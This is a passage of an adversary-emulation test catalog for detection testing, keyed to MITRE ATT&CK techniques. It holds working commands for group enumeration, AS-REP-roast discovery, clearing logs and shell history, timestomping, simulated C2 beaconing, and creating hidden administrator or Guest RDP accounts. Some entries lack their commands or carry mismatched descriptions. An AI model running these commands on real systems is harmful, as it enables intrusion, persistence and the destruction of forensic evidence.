Description: An adversary may attempt to execute malicious script using AutoHotKey software instead of regular terminal like powershell or cmd. A messagebox will be displayed and calculator will popup when the script is executed successfully
Prereq: AutoHotKey executable file must exist on disk at the specified location ($..\ExternalPayloads\ahk\AutoHotKeyU64.exe)
Description: An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Prereq: AutoIt executable file must exist on disk at the specified location (C:\Program Files (x86)\AutoIt3\AutoIt3.exe)
T1069.001 - Permission Groups Discovery: Local Groups
Permission Groups Discovery (Local)
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi; if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi; if [ -x "$(command -v id)" ]; then id; else echo "id is missing from the machine. skipping..."; fi; if [ -x "$(command -v getent)" ]; then getent group; else echo "getent is missing from the machine. skipping..."; fi; cat /etc/group
Description: Permission Groups Discovery
T1069.001 - Permission Groups Discovery: Local Groups
Basic Permission Groups Discovery Windows (Local)
net localgroup net localgroup "Administrators"
Description: Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
T1069.001 - Permission Groups Discovery: Local Groups
Description: Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
T1069.001 - Permission Groups Discovery: Local Groups
Description: This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR)
Prereq: SharpHound binary must exist on disk and at specified location (..\ExternalPayloads\SharpHound.exe). And the computer must be domain joined (implicit authentication).
T1069.001 - Permission Groups Discovery: Local Groups
Wmic Group Discovery
wmic group get name
Description: Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system.
T1069.001 - Permission Groups Discovery: Local Groups
WMIObject Group Discovery
Get-WMIObject Win32_Group
Description: Utilizing PowerShell cmdlet - get-wmiobject, to enumerate local groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system.
T1069.001 - Permission Groups Discovery: Local Groups
Permission Groups Discovery for Containers- Local Groups
Description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
Prereq: Verify docker is installed.
which docker
Prereq: Verify docker service is running.
sudo systemctl status docker --no-pager
Cleanup:
docker stop t1069_container docker rmi -f t1069
T1069.002 - Permission Groups Discovery: Domain Groups
Basic Permission Groups Discovery Windows (Domain)
net localgroup net group /domain net group "enterprise admins" /domain net group "domain admins" /domain
Description: Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Permission Groups Discovery PowerShell (Domain)
get-ADPrincipalGroupMembership $env:USERNAME | select name
Description: Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Elevated group enumeration using net group (Domain)
net groups "Account Operators" /domain net groups "Exchange Organization Management" /domain net group "BUILTIN\Backup Operators" /domain net group "Domain Admins" /domain
Description: Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Find machines where user has local admin access (PowerView)
Description: Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Find local admins on all machines in domain (PowerView)
Description: Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Description: takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Enumerate Users Not Requiring Pre Auth (ASRepRoast)
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
Description: When successful, accounts that do not require kerberos pre-auth will be returned
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1069.002 - Permission Groups Discovery: Domain Groups
Enumerate Active Directory Groups with Get-AdGroup
Get-AdGroup -Filter *
Description: The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
Upon successful execution a listing of groups will output with their paths in AD.
Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
T1069.002 - Permission Groups Discovery: Domain Groups
Enumerate Active Directory Groups with ADSISearcher
Description: The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
Upon successful execution a listing of groups will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
T1069.002 - Permission Groups Discovery: Domain Groups
Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
Description: When successful, accounts that do not require kerberos pre-auth will be returned.
Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
Description: Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Description: Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
Prereq: PowerShell ActiveDirectory Module must be installed
T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
Clear Logs
wevtutil cl System
Description: Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
Description: Clear event logs using built-in PowerShell commands.
Upon successful execution, you should see the list of deleted event logs
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
Description: This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system.
Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error
Description: This test truncates the system log files using the truncate utility with (-s 0) parameter which sets file size to zero, thus emptying the file content
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Truncate system log files via truncate utility (freebsd)
Description: This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete log files via cat utility by appending /dev/null or /dev/zero
sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes sudo dd if=/dev/zero bs=1000 count=5 of=/var/log/system.log #log file filled with null bytes(zeros)
Description: The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
cat /dev/null > /var/log/messages #truncating the file to zero bytes cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
Description: The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Description: This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files via unlink utility
sudo unlink /var/log/system.log
Description: This test deletes the system log file using unlink utility
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files via unlink utility (freebsd)
unlink /var/log/messages
Description: This test deletes the messages log file using unlink utility
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files using shred utility
sudo shred -u -z -n 3 /var/log/system.log
Description: This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Description: This test securely deletes the system log files individually and recursively using the srm utility.
Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
Prereq: target files must exist
stat /var/log/system.log /var/log/
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files using OSAScript
osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
Description: This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files using Applescript
osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
Description: This test deletes the system log file using applescript using osascript via Finder application
Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework.
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system journal logs via rm and journalctl utilities
sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
Description: The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
Prereq: target files must exist
stat /var/log/journal
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Overwrite Linux Mail Spool
echo 0> /var/spool/mail/root
Description: This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
Prereq: target files must exist
stat /var/spool/mail/root
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Overwrite Linux Log
echo 0> /var/log/secure
Description: This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
Cleanup:
if [ "/var/log/secure" != "/var/log/secure" ] ; then rm -f /var/log/secure ; fi
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (rm)
rm ~/.bash_history
Description: Clears bash history via rm
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (echo)
echo "" > ~/.bash_history
Description: Clears bash history via echo
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (cat dev/null)
cat /dev/null > ~/.bash_history
Description: Clears bash history via cat /dev/null
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (ln dev/null)
ln -sf /dev/null ~/.bash_history
Description: Clears bash history via a symlink to /dev/null
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (truncate)
truncate -s0 ~/.bash_history
Description: Clears bash history via truncate
T1070.003 - Indicator Removal on Host: Clear Command History
Clear history of a bunch of shells
unset HISTFILE export HISTFILESIZE=0 history -c
Description: Clears the history of a bunch of different shell types by setting the history size to zero
T1070.003 - Indicator Removal on Host: Clear Command History
Clear and Disable Bash History Logging
set +o history echo 'set +o history' >> ~/.bashrc . ~/.bashrc history -c
Description: Clears the history and disable bash history logging of the current shell and future shell sessions
Cleanup:
sed -i 's/set +o history//g' ~/.bashrc . ~/.bashrc set -o history
T1070.003 - Indicator Removal on Host: Clear Command History
Use Space Before Command to Avoid Logging to History
hostname whoami
Description: Using a space before a command causes the command to not be logged in the Bash History file
T1070.003 - Indicator Removal on Host: Clear Command History
Description: Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
Prereq: Install sshpass and create user account used for excuting
Description: The "AddToHistoryHandler" receives the current command as the $line variable and then returns $true if
the line should be written to the history file. Here we simply return $false so nothing gets added to
the history file for the current session.
Cleanup:
Set-PSReadLineOption -AddToHistoryHandler $null
T1070.003 - Indicator Removal on Host: Clear Command History
Clear PowerShell Session History
Clear-History
Description: This technique involves using the Clear-History cmdlet in PowerShell to remove all records of previously executed commands.
This action is often performed by attackers to eliminate traces of their activities, making incident detection and forensic
investigation more challenging. By clearing the session history, adversaries aim to obfuscate their operational footprint.
T1070.004 - Indicator Removal on Host: File Deletion
Delete a single file - FreeBSD/Linux/macOS
rm -f /tmp/victim-files/T1070.004-test.txt
Description: Delete a single file from the temporary directory
Prereq: The file must exist in order to be deleted
test -e /tmp/victim-files/T1070.004-test.txt && exit 0 || exit 1
Cleanup:
rm -rf /tmp/victim-files/
T1070.004 - Indicator Removal on Host: File Deletion
Delete an entire folder - FreeBSD/Linux/macOS
rm -rf /tmp/victim-folder
Description: Recursively delete the temporary directory and all files contained within it
Prereq: The folder must exist in order to be deleted
test -e /tmp/victim-folder && exit 0 || exit 1
T1070.004 - Indicator Removal on Host: File Deletion
Overwrite and delete a file with shred
shred -u /tmp/victim-shred.txt
Description: Use the `shred` command to overwrite the temporary file and then delete it
Prereq: Check if file already exists
if [ -f "/tmp/victim-shred.txt" ]; then echo "File already exists"; else echo "File does NOT exist yet"; exit 1; fi
T1070.004 - Indicator Removal on Host: File Deletion
Delete a single file - Windows cmd
del /f %temp%\deleteme_T1551.004
Description: Delete a single file from the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
Prereq: The file to delete must exist on disk at specified location (%temp%\deleteme_T1551.004)
T1070.004 - Indicator Removal on Host: File Deletion
Delete an entire folder - Windows cmd
rmdir /s /q %temp%\deleteme_T1551.004
Description: Recursively delete a folder in the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
Prereq: The file to delete must exist on disk at specified location (%temp%\deleteme_T1551.004)
T1070.004 - Indicator Removal on Host: File Deletion
Delete a single file - Windows PowerShell
Remove-Item -path $env:TEMP\deleteme_T1551.004
Description: Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
Prereq: The file to delete must exist on disk at specified location ($env:TEMP\deleteme_T1551.004)
if (Test-Path $env:TEMP\deleteme_T1551.004) {exit 0} else {exit 1}
T1070.004 - Indicator Removal on Host: File Deletion
Description: Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
Prereq: The folder to delete must exist on disk at specified location ($env:TEMP\deleteme_folder_T1551.004)
if (Test-Path $env:TEMP\deleteme_folder_T1551.004) {exit 0} else {exit 1}
T1070.004 - Indicator Removal on Host: File Deletion
Description: This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
T1070.004 - Indicator Removal on Host: File Deletion
Description: Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run `(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count`
before and after the test to verify that the number of prefetch files decreases by 1.
T1070.004 - Indicator Removal on Host: File Deletion
Description: Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
T1070.004 - Indicator Removal on Host: File Deletion
Clears Recycle bin via rd
rd /s /q %systemdrive%\$RECYCLE.BIN
Description: An adversary clears the recycle bin in the system partition using rd to remove traces of deleted files.
[Reference](https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/)
T1070.005 - Indicator Removal on Host: Network Share Connection Removal
Add Network Share
net use c: \\test\share net share test=\\test\share /REMARK:"test share" /CACHE:No
Description: Add a Network Share utilizing the command_prompt
T1070.005 - Indicator Removal on Host: Network Share Connection Removal
Remove Network Share
net share \\test\share /delete
Description: Removes a Network Share utilizing the command_prompt
T1070.005 - Indicator Removal on Host: Network Share Connection Removal
Description: Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators
remote access to every disk volume on a network-connected system. These shares are automatically created at started unless they have been
purposefully disabled as is done in this Atomic test. As Microsoft puts it, "Missing administrative shares typically
indicate that the computer in question has been compromised by malicious software."
https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
T1070.005 - Indicator Removal on Host: Network Share Connection Removal
Remove Administrative Shares
for %i in (C$ IPC$ ADMIN$) do net share %i /delete
Description: Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators
remote access to every disk volume on a network-connected system. As Microsoft puts it, “Missing administrative shares typically
indicate that the computer in question has been compromised by malicious software.
https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
Cleanup:
net share ADMIN$ /UNLIMITED >nul 2>&1 net share C$=C:\ >nul 2>&1 net share IPC$ >nul 2>&1
T1070.006 - Indicator Removal on Host: Timestomp
Set a file's access timestamp
touch -a -t 197001010000.00 /tmp/T1070.006-access.txt
Description: Stomps on the access timestamp of a file
Prereq: The file must exist in order to be timestomped
test -e /tmp/T1070.006-access.txt && exit 0 || exit 1
Description: Stomps on the modification timestamp of a file
Prereq: The file must exist in order to be timestomped
test -e /tmp/T1070.006-modification.txt && exit 0 || exit 1
Cleanup:
rm -f /tmp/T1070.006-modification.txt
T1070.006 - Indicator Removal on Host: Timestomp
Set a file's creation timestamp
NOW=$(date +%m%d%H%M%Y) date 010100001971 touch /tmp/T1070.006-creation.txt date "$NOW" stat /tmp/T1070.006-creation.txt
Description: Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
Description: Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
Cleanup:
rm -f /tmp/T1070.006-reference.txt
T1070.006 - Indicator Removal on Host: Timestomp
Windows - Modify file creation timestamp with PowerShell
Description: Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
Prereq: A file must exist at the path (..\ExternalPayloads\T1551.006_timestomp.txt) to change the creation time on
if (Test-Path "..\ExternalPayloads\T1551.006_timestomp.txt") {exit 0} else {exit 1}
T1070.006 - Indicator Removal on Host: Timestomp
Windows - Modify file last modified timestamp with PowerShell
Description: Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
Prereq: A file must exist at the path (..\ExternalPayloads\T1551.006_timestomp.txt) to change the modified time on
if (Test-Path "..\ExternalPayloads\T1551.006_timestomp.txt") {exit 0} else {exit 1}
T1070.006 - Indicator Removal on Host: Timestomp
Windows - Modify file last access timestamp with PowerShell
Description: Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
Prereq: A file must exist at the path ("..\ExternalPayloads\T1551.006_timestomp.txt") to change the last access time on
if (Test-Path "..\ExternalPayloads\T1551.006_timestomp.txt") {exit 0} else {exit 1}
Description: Timestomp kxwn.lock.
Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file.
[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
Prereq: timestomp.ps1 must be present in ..\ExternalPayloads.
if (Test-Path "..\ExternalPayloads\timestomp.ps1") {exit 0} else {exit 1}
Prereq: kxwn.lock must be present in ..\ExternalPayloads.
if (Test-Path -path "..\ExternalPayloads\kxwn.lock") {exit 0} else {exit 1}
T1070.006 - Indicator Removal on Host: Timestomp
MacOS - Timestomp Date Modified
SetFile -m 01/01/1970 /tmp/T1070.006-modified.txt
Description: Stomps on the modification timestamp of a file using MacOS's SetFile utility
Prereq: The file must exist in order to be timestomped
test -e /tmp/T1070.006-modified.txt && exit 0 || exit 1
Cleanup:
rm -f /tmp/T1070.006-modified.txt
T1070.006 - Indicator Removal on Host: Timestomp
Event Log Manipulations- Time slipping via Powershell
Description: Changes the system time on the computer to a time that you specify. It involves altering the system’s clock or adjusting the dates of files, affecting timestamp integrity within Event Logs. This technique can disrupt the sequence of logged events, complicating incident analysis and forensics.
Reference -
https://detect.fyi/event-log-manipulations-1-time-slipping-55bf95631c40
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/set-date?view=powershell-7.4
mkdir -p /var/spool/mail/copy; for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"; fi; fi; done
Description: Copies and modifies mail data on Linux
Prereq: Create dummy file in /var/spool/mail/ if no files exist
if [ -z "$(ls -A /var/spool/mail/)" ]; then exit 1; else exit 0; fi
Cleanup:
rm -rf /var/spool/mail/copy if [ -f "$(ls -A /var/spool/mail/temp)" ]; then rm /var/spool/mail/temp; fi
Description: Copies and modifies mail data on macOS
Cleanup:
rm -rf ~/Library/Mail/copy
T1070 - Indicator Removal on Host
Indicator Removal using FSUtil
fsutil usn deletejournal /D C:
Description: Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output
will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
Description: Finds a file by user name (if Disk Quotas are enabled), queries allocated ranges for a file, sets a file's short name, sets a file's valid data length, sets zero data for a file, or creates a new file. Upon execution, no output
will be displayed. More information about fsutil can be found at https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file
- https://tria.ge/230601-x8x6bsgb24/behavioral2
Cleanup:
rm "..\ExternalPayloads\T1070-2.txt"
T1071.001 - Application Layer Protocol: Web Protocols
Description: This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
T1071.001 - Application Layer Protocol: Web Protocols
Malicious User Agents - CMD
C:\Windows\System32\Curl.exe -s -A "HttpBrowser/1.0" -m3 www.google.com >nul 2>&1 C:\Windows\System32\Curl.exe -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com >nul 2>&1 C:\Windows\System32\Curl.exe -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com >nul 2>&1 C:\Windows\System32\Curl.exe -s -A "*<|>*" -m3 www.google.com >nul 2>&1
Description: This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
Prereq: Curl must be installed on system
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}
T1071.001 - Application Layer Protocol: Web Protocols
Malicious User Agents - Nix
curl -s -A "HttpBrowser/1.0" -m3 www.google.com curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com curl -s -A "*<|>*" -m3 www.google.com
Description: This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
Description: This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
Description: This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
Description: This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
Description: This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
T1071 - Application Layer Protocol
Telnet C2
T1071\bin\telnet_client.exe 127.0.0.1 --port 23
Description: An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
Prereq: A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)
Description: Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
Description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
Enable Guest account with RDP capability and admin privileges
net user guest /active:yes net user guest Password123! net localgroup Administrators guest /add net localgroup "Remote Desktop Users" guest /add reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Description: After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
and desktop will allow multiple RDP connections.
Cleanup:
net user guest /active:no >nul 2>&1 net localgroup Administrators guest /delete >nul 2>&1 net localgroup "Remote Desktop Users" guest /delete >nul 2>&1 if 0 NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) if 0 EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) if 0 EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
T1078.001 - Valid Accounts: Default Accounts
Activate Guest Account
net user guest /active:yes
Description: The Adversaries can activate the default Guest user. The guest account is inactivated by default
Cleanup:
net user guest /active:no
T1078.001 - Valid Accounts: Default Accounts
Enable Guest Account on macOS
sudo sysadminctl -guestAccount on
Description: This test enables the guest account on macOS using sysadminctl utility.
Cleanup:
sudo sysadminctl -guestAccount off
T1078.003 - Valid Accounts: Local Accounts
Create local account with admin privileges
net user art-test /add net user art-test -4RTisCool!-321 net localgroup administrators art-test /add
Description: After execution the new account will be active and added to the Administrators group
Cleanup:
net localgroup administrators art-test /delete >nul 2>&1 net user art-test /delete >nul 2>&1
T1078.003 - Valid Accounts: Local Accounts
Create local account with admin privileges - MacOS
Description: Loot local Credentials - Safetykatz technique via function of WinPwn
T1078.003 - Valid Accounts: Local Accounts
Create local account (Linux)
password=$(openssl passwd -1 art) ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) su art -c "whoami; exit"
Description: An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
Cleanup:
[ "$(uname)" = 'Linux' ] && userdel art -rf || rmuser -y art
T1078.003 - Valid Accounts: Local Accounts
Reactivate a locked/expired account (Linux)
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art usermod --lock art usermod --expiredate "1" art usermod --unlock art usermod --expiredate "99999" art su -c whoami art
Description: A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate.
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
Cleanup:
userdel -r art
T1078.003 - Valid Accounts: Local Accounts
Reactivate a locked/expired account (FreeBSD)
pw useradd art -g wheel -s /bin/sh echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 pw lock art pw usermod art -e +1d pw unlock art pw user mod art -e +99d su art whoami exit
Description: A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate.
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
